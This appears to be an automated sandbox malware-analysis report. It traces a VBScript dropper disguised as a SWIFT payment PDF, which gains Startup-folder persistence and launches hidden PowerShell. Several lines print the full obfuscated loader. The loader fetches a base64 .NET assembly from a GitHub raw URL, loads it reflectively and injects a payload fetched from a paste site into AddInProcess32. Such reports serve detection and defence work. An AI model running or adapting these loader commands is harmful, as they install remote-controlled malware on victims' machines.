            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IHost.FullName();IWshShell3.CurrentDirectory();IHost.ScriptName();IWshShell3.SpecialFolders("Startup");IFileSystem3.FileExists("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wernerite.vbs");IFileSystem3.CopyFile("C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs", "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wernerite.vbs");IWshShell3.Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IWshShell3.Run("powershell -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJ", "0", "false")
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
            Obfuscated command line found
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"Jump to behavior
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,10_2_0041A8DA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CD4FF3 push eax; retf 5_2_00007FF848CD4FE9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CD00BD pushad ; iretd 5_2_00007FF848CD00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848CE2325 push eax; iretd 6_2_00007FF848CE233D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848CE00BD pushad ; iretd 6_2_00007FF848CE00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848CD85A6 push esp; iretd 8_2_00007FF848CD85AC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848CD0E15 push ds; iretd 8_2_00007FF848CD0E43
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848CD00BD pushad ; iretd 8_2_00007FF848CD00C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004000D8 push es; iretd 10_2_004000D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040008C push es; iretd 10_2_0040008D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004542E6 push ecx; ret 10_2_004542F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0045B4FD push esi; ret 10_2_0045B506
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00432BD6 push ecx; ret 10_2_00432BE9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00454C08 push eax; ret 10_2_00454C26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004063C6 ShellExecuteW,URLDownloadToFileW,10_2_004063C6
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,10_2_00418A00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,10_2_0041A8DA
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
